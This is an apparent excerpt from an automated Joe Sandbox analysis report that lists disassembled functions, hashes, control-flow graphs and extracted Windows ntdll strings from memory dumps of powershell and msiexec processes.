                                            • Instruction Fuzzy Hash: 6331C4B4B10229DFE724DF58C454A5EFBAAFB48710F249559E809AF790C731DC42CBA2
                                            Function 073EE0D8 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 84)l$XRcq$XRcq$tP^q$$^q
                                            • API String ID: 0-631777751
                                            • Opcode ID: f9613fd2c03b2d7e3b2a0e3c35958ecdb201431543a9eaeea76c107a1c71adf7
                                            • Instruction ID: d7a6bdbe7a865a790be0fe9071f34b8b718eb4bad97b0423be7fdaaf3450ead7
                                            • Opcode Fuzzy Hash: f9613fd2c03b2d7e3b2a0e3c35958ecdb201431543a9eaeea76c107a1c71adf7
                                            • Instruction Fuzzy Hash: 9E4193B0A40229DBFB24DE45C544BA9BBFAAF89710F19C099E81C6B3D4C732DD80CB50
                                            Function 073E4425 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3272787073
                                            • Opcode ID: 7f0f90e5247a0e767e96c23ae33d8ddd02812c3bd6faaaf5504b036a569e7ab7
                                            • Instruction ID: 9691ed96a12b3419dbcf63454cac043f6e8f741c63f4cd0845ed1df99781c68c
                                            • Opcode Fuzzy Hash: 7f0f90e5247a0e767e96c23ae33d8ddd02812c3bd6faaaf5504b036a569e7ab7
                                            • Instruction Fuzzy Hash: EA3146F6F002BACFEB294E259444176B7ADABC9611B24886FE81D8F6C4DE31C445CB51
                                            Function 073E8588 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: a9dd03b020475321fa25e75751fc9bc6f7f3df5584c619541133b43e78830c68
                                            • Instruction ID: d1746795313a4221eb6b36e76784b66cdd18f24214f046d946065d0db5b0ab68
                                            • Opcode Fuzzy Hash: a9dd03b020475321fa25e75751fc9bc6f7f3df5584c619541133b43e78830c68
                                            • Instruction Fuzzy Hash: F731E6F1E00225DBFB248E15C544BE6B7ADBB85310F149069D91D5F6D0CB31D884CB51
                                            Function 073EB470 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$!l$!l
                                            • API String ID: 0-3278379306
                                            • Opcode ID: b462a52be6ab4fb782de5315b07667a77c198839e13be218dcc33b478192d464
                                            • Instruction ID: f19cdf9e158fca52e1bf5d234cd4056ced81ab1d6fea42de15d2d029f392afbd
                                            • Opcode Fuzzy Hash: b462a52be6ab4fb782de5315b07667a77c198839e13be218dcc33b478192d464
                                            • Instruction Fuzzy Hash: 3411D6F130433A9BF736595A9804F76F79EABC1720F24C42AA54D8A6D4D971C841CB50
                                            Function 073EC670 Relevance: 5.5, Strings: 4, Instructions: 476COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                            • API String ID: 0-1978863864
                                            • Opcode ID: 7b95ad28fac787b1e68efa8aa611dfc1801f6ab6a76f3ea147226254059e3db5
                                            • Instruction ID: fcbd93026e7365f0a32fe241c07473ba7988e568db6898e037028fd04efc669f
                                            • Opcode Fuzzy Hash: 7b95ad28fac787b1e68efa8aa611dfc1801f6ab6a76f3ea147226254059e3db5
                                            • Instruction Fuzzy Hash: 80F159B170431ADFEB158F68C8407AEBBAABF85310F14947AE8499B2D1DB31D845C7B0
                                            Function 073E1148 Relevance: 5.5, Strings: 4, Instructions: 471COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-1420252700
                                            • Opcode ID: 46fa603634cfba61cd7b9e5383f01304c0ded9f090a3c7e20c653cc8ea28fdf0
                                            • Instruction ID: 56e69cc7874b988542784241c313cea39b0bb3349c28600537dfa6e2df3477a1
                                            • Opcode Fuzzy Hash: 46fa603634cfba61cd7b9e5383f01304c0ded9f090a3c7e20c653cc8ea28fdf0
                                            • Instruction Fuzzy Hash: A8127EB4B0121D9FE714CB98C451F9ABBB6BB88304F14C069E809AF795CB72EC45CB91
                                            Function 073EE380 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: f161918a4e75a215373d227370d59508250388d5b7c2aa59ac418cb41d4b75a2
                                            • Instruction ID: 2c6620eab78463087f7aa1bbd9176bd177635eb4c9efb266a2246a075e23f41f
                                            • Opcode Fuzzy Hash: f161918a4e75a215373d227370d59508250388d5b7c2aa59ac418cb41d4b75a2
                                            • Instruction Fuzzy Hash: 1AC19EF4A40229DFFB24DB54C551B6EFBBAAF88704F148429D80A6B794CB31EC45CB91
                                            Function 073E00F0 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$XY+l$XY+l
                                            • API String ID: 0-1222878540
                                            • Opcode ID: a65220a47d1c4c45585c2530b2572ca2d4a8d484b8437efa8480e768d06c3ee4
                                            • Instruction ID: 775fe0e35c1a36302d7602bbb47828b24f61a10123f82a6f259aaffccb72c30b
                                            • Opcode Fuzzy Hash: a65220a47d1c4c45585c2530b2572ca2d4a8d484b8437efa8480e768d06c3ee4
                                            • Instruction Fuzzy Hash: D3814CF570432A8FE7198B68954466ABBEE9FC6210F38807BC40DCF2D5EA72D845C761
                                            Function 073E7EF0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l
                                            • API String ID: 0-2354121962
                                            • Opcode ID: 6c9690d24785cd794ba4c467e834db1dfac7da899f4ade23ccf4bc721705d8e7
                                            • Instruction ID: 206a094b91d3d1d03234be05019da28d2b39fbc58df09eeb1ae864866a582a01
                                            • Opcode Fuzzy Hash: 6c9690d24785cd794ba4c467e834db1dfac7da899f4ade23ccf4bc721705d8e7
                                            • Instruction Fuzzy Hash: 4A7172B4E01219DFEB14CF58C551AAEFBFAAF85314F148069D8086B795CB32EC42CB91
                                            Function 073EE8FA Relevance: 5.2, Strings: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4(l
                                            • API String ID: 0-187886399
                                            • Opcode ID: defdba9f53bc1ab719be9bcfd9a2c8e1e703b4fa531d17bc259e4267f5be1dde
                                            • Instruction ID: a89743553017d9bc5cb7f7eb601f5152e55cae869842a6b1a3ae90f887b1e9aa
                                            • Opcode Fuzzy Hash: defdba9f53bc1ab719be9bcfd9a2c8e1e703b4fa531d17bc259e4267f5be1dde
                                            • Instruction Fuzzy Hash: 8C61E1F4A40216DFFB24CF54C441A6AFBEABF85314F18816DE8496B395CB71E841CB92
                                            Function 073E1DB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            • Opcode ID: b30fc3af97953cbb968d6fcfa5c44f0b14402fb0cb9eedb413c6cae8380cfb25
                                            • Instruction ID: cc307f12e4fac00d7910e23b053ab73224b2c5a581326aad3198386c840d4c69
                                            • Opcode Fuzzy Hash: b30fc3af97953cbb968d6fcfa5c44f0b14402fb0cb9eedb413c6cae8380cfb25
                                            • Instruction Fuzzy Hash: EF2135B270022EABFB34592A9841B37B69E9BC1710F24842AB90DCB3C5CD36D8808361
                                            Function 073E1C39 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q
                                            • API String ID: 0-2049395529
                                            • Opcode ID: 43e71ea58941365dc4b22a7690018d102ee535642230067fec9d606a34382f36
                                            • Instruction ID: e28e71a137cbe0e20a70b8b41f2549178efd8c6fb29200baecb51737fd7e4a04
                                            • Opcode Fuzzy Hash: 43e71ea58941365dc4b22a7690018d102ee535642230067fec9d606a34382f36
                                            • Instruction Fuzzy Hash: 1301FC606493995FD72B022808205766FA65FC351071A44DFC085DF3D7CC658C898397

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:25%
                                            Total number of Nodes:4
                                            Total number of Limit Nodes:1
                                            execution_graph 18619 24892c0a 18620 24892c1f LdrInitializeThunk 18619->18620 18621 24892c11 18619->18621 18623 24892df0 LdrInitializeThunk

                                            Executed Functions

                                            Function 248935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5 248935c0-248935cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a7254fe8a8015a9489dcb0b81c3bbbdf3b4cfb5132bedf89f1586df01619f01b
                                            • Instruction ID: 6d545189bc49330dfd15ed2e667ca074ed61fd532b66791f79fd90444b736821
                                            • Opcode Fuzzy Hash: a7254fe8a8015a9489dcb0b81c3bbbdf3b4cfb5132bedf89f1586df01619f01b
                                            • Instruction Fuzzy Hash: 8D900271B1951446D1007198455470610055BD0205F65C511B1425528D87D5DA9565F3
                                            Function 24892DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 24892df0-24892dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 48d5ebcc426c2e462744450f57ec548479d5ef7c65fc3cbb197ceb70e2e6350e
                                            • Instruction ID: 3b729bc35748fc4310d00f0f0c1640f12885b1a3d0fd82e4d337106ca8f72918
                                            • Opcode Fuzzy Hash: 48d5ebcc426c2e462744450f57ec548479d5ef7c65fc3cbb197ceb70e2e6350e
                                            • Instruction Fuzzy Hash: BB90027171541457D1117198454470700095BD0245F95C512B1425518D9696DA96A172
                                            Function 24892C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 24892c0a-24892c0f 1 24892c1f-24892c26 LdrInitializeThunk 0->1 2 24892c11-24892c18 0->2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 89590b7fcc375701e9f01003361c7acefdff1a6522e90af23c22807e116ed92c
                                            • Instruction ID: 85dd0ead90840e12cde35ea59e6cd74472f0505f6606c34d65c68f5098accc39
                                            • Opcode Fuzzy Hash: 89590b7fcc375701e9f01003361c7acefdff1a6522e90af23c22807e116ed92c
                                            • Instruction Fuzzy Hash: 89B09B71E159D5C9D701E760460870779407BD0705F15C561E3030651F4778D1D5E1B7

                                            Non-executed Functions

                                            Function 24888620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C54CE
                                            • Critical section address., xrefs: 248C5502
                                            • Critical section address, xrefs: 248C5425, 248C54BC, 248C5534
                                            • 8, xrefs: 248C52E3
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 248C5543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C54E2
                                            • corrupted critical section, xrefs: 248C54C2
                                            • Address of the debug info found in the active list., xrefs: 248C54AE, 248C54FA
                                            • Thread identifier, xrefs: 248C553A
                                            • Critical section debug info address, xrefs: 248C541F, 248C552E
                                            • double initialized or corrupted critical section, xrefs: 248C5508
                                            • Invalid debug info address of this critical section, xrefs: 248C54B6
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 248C540A, 248C5496, 248C5519
                                            • undeleted critical section in freed memory, xrefs: 248C542B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 2fe71d3bc217e198272887af9830b7654515ef586e5a2f6476dd22d316f7e84b
                                            • Instruction ID: f4c2d7e2bc0d2540f955fbc93dcbb195cc3ef110ae8acdc71868b8a9726da96a
                                            • Opcode Fuzzy Hash: 2fe71d3bc217e198272887af9830b7654515ef586e5a2f6476dd22d316f7e84b
                                            • Instruction Fuzzy Hash: 3B8168B1A11268EFDB24CF99C894F9EBBF5BB48714F104259F504B7B44D375A940CBA0
                                            Function 2484D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 274 2484d08d-2484d0b6 275 248aa812 274->275 276 2484d0bc-2484d0bf 274->276 278 248aa81c-248aa825 call 24892b60 275->278 276->275 277 2484d0c5-2484d115 call 24895130 call 24892b90 276->277 286 248aa785-248aa79f call 2490b256 277->286 287 2484d11b-2484d12c call 2484d796 277->287 285 248aa82a-248aa82c 278->285 288 248aa832-248aa838 285->288 289 2484d23e-2484d246 285->289 295 2484d1f4-2484d1f9 286->295 296 248aa7a5-248aa7a8 286->296 297 2484d132-2484d135 287->297 298 248aa7e0 287->298 288->289 294 248aa83e-248aa841 288->294 299 248aa843-248aa855 GetPEB call 24863ca0 294->299 300 248aa860-248aa862 294->300 301 2484d204-2484d209 295->301 302 2484d1fb-2484d1ff call 24892b60 295->302 303 248aa7ca-248aa7da call 24892b60 296->303 304 248aa7aa-248aa7be call 2490b1e1 296->304 305 2484d249-2484d24c 297->305 306 2484d13b-2484d140 297->306 316 248aa7ea-248aa804 call 2490b256 298->316 299->300 300->289 301->278 309 2484d20f-2484d214 301->309 302->301 303->298 304->303 328 248aa7c0-248aa7c5 304->328 314 2484d252-2484d25c 305->314 315 2484d329-2484d339 call 2484da02 305->315 311 2484d146-2484d190 call 24895130 call 24892b90 306->311 312 2484d1f2 306->312 318 2484d216-2484d21a call 24892b60 309->318 319 2484d21f-2484d221 309->319 311->316 346 2484d196-2484d1e4 call 24895130 call 24892b90 311->346 312->295 324 2484d262-2484d2ba call 24895130 call 24892b90 314->324 325 2484d33e-2484d340 314->325 315->295 316->295 336 248aa80a-248aa80c 316->336 318->319 319->285 330 2484d227-2484d22a 319->330 332 2484d2bf-2484d2c1 324->332 325->332 328->303 338 248aa7c7-248aa7c9 328->338 330->289 340 2484d22c-2484d238 call 2484db08 330->340 332->315 337 2484d2c3-2484d327 call 24895130 call 24892b90 332->337 336->275 337->315 353 2484d345 337->353 338->303 340->289 350 248aa857-248aa85b 340->350 346->315 356 2484d1ea-2484d1f0 346->356 350->300 353->286 356->295 356->312
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2484D2C3
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2484D0CF
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2484D262
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2484D146
                                            • @, xrefs: 2484D2AF
                                            • @, xrefs: 2484D313
                                            • @, xrefs: 2484D0FD
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 2484D196
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: 25f23721b1d59b81d0f26a2de5a8e2fa71f7bbc7571336d395de711f0a152c73
                                            • Instruction ID: 54dc99b23697e25476a5cce361fa6577feb111ba4c5b6eaaa66a51cd3f4f0566
                                            • Opcode Fuzzy Hash: 25f23721b1d59b81d0f26a2de5a8e2fa71f7bbc7571336d395de711f0a152c73
                                            • Instruction Fuzzy Hash: CFA13F71928759DFE311CF25C480B5BB7E8BB88719F004A2EFA9896240E7B4D948CF53
                                            Function 248FF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 703 248ff525-248ff547 call 248a7e54 706 248ff549-248ff55e 703->706 707 248ff563-248ff57b call 248476b2 703->707 720 248ff867-248ff876 706->720 711 248ff852 707->711 712 248ff581-248ff59c 707->712 715 248ff855-248ff864 call 248ff879 711->715 713 248ff59e 712->713 714 248ff5a5-248ff5b7 712->714 713->714 717 248ff5bc-248ff5c4 714->717 718 248ff5b9-248ff5bb 714->718 715->720 721 248ff5ca-248ff5cd 717->721 722 248ff7d0-248ff7d9 GetPEB 717->722 718->717 721->722 726 248ff5d3-248ff5d6 721->726 724 248ff7db-248ff7f6 GetPEB call 2484b970 722->724 725 248ff7f8-248ff7fd call 2484b970 722->725 732 248ff802-248ff816 call 2484b970 724->732 725->732 729 248ff5d8-248ff5f0 call 2485ffb0 726->729 730 248ff5f3-248ff616 call 24900cb5 call 24865e70 call 249011a4 726->730 729->730 730->715 743 248ff61c-248ff623 730->743 732->711 744 248ff62e-248ff636 743->744 745 248ff625-248ff62c 743->745 746 248ff638-248ff648 744->746 747 248ff654-248ff658 744->747 745->744 746->747 748 248ff64a-248ff64f call 2490dac6 746->748 749 248ff65a-248ff66d call 24883bc9 747->749 750 248ff688-248ff68e 747->750 748->747 759 248ff67f 749->759 760 248ff66f-248ff67d call 2487fe99 749->760 751 248ff691-248ff69b 750->751 754 248ff6af-248ff6b6 751->754 755 248ff69d-248ff6ad 751->755 757 248ff6b8-248ff6bc call 24900cb5 754->757 758 248ff6c1-248ff6d0 GetPEB 754->758 755->754 757->758 762 248ff73e-248ff749 758->762 763 248ff6d2-248ff6d5 758->763 765 248ff682-248ff686 759->765 760->765 762->715 766 248ff74f-248ff755 762->766 767 248ff6d7-248ff6f2 GetPEB call 2484b970 763->767 768 248ff6f4-248ff6f9 call 2484b970 763->768 765->751 766->715 770 248ff75b-248ff762 766->770 775 248ff6fe-248ff712 call 2484b970 767->775 768->775 770->715 773 248ff768-248ff773 770->773 773->715 776 248ff779-248ff782 GetPEB 773->776 783 248ff715-248ff71f GetPEB 775->783 778 248ff784-248ff79f GetPEB call 2484b970 776->778 779 248ff7a1-248ff7a6 call 2484b970 776->779 786 248ff7ab-248ff7cb call 248f86ba call 2484b970 778->786 779->786 783->715 784 248ff725-248ff739 783->784 784->715 786->783
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: eb5afd4df328bbcbefe12d2f11f86becc1e179ad56dbadb299360b3ebfedbad5
                                            • Instruction ID: aa04a3b1db6f8818363601b34190f2328635f2e842a45ee46582b812c18e8876
                                            • Opcode Fuzzy Hash: eb5afd4df328bbcbefe12d2f11f86becc1e179ad56dbadb299360b3ebfedbad5
                                            • Instruction Fuzzy Hash: 50916831A20684DFDB02CFA8C850A9DBFF1FF59710F95824EE642AB361CB759941CB10
                                            Function 2484645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 248A9A01
                                            • LdrpInitShimEngine, xrefs: 248A99F4, 248A9A07, 248A9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 248A9A2A
                                            • apphelp.dll, xrefs: 24846496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248A9A11, 248A9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 248A99ED
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: 02f413e1aa5c1923f70340191751f62ac1bafaa8b64dfe52d5b65513af8b2577
                                            • Instruction ID: 7bd734b0ed662bf01a3c4f95a3882593f4b56748d4570c887b73b1fa81232b6e
                                            • Opcode Fuzzy Hash: 02f413e1aa5c1923f70340191751f62ac1bafaa8b64dfe52d5b65513af8b2577
                                            • Instruction Fuzzy Hash: EB519E71628318DFE321CF24D890E5B7BE4EF94B44F004B1AF595AB264D6B4E984CB92
                                            Function 2488C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • Loading import redirection DLL: '%wZ', xrefs: 248C8170
                                            • LdrpInitializeProcess, xrefs: 2488C6C4
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 248C8181, 248C81F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 2488C6C3
                                            • LdrpInitializeImportRedirection, xrefs: 248C8177, 248C81EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 248C81E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
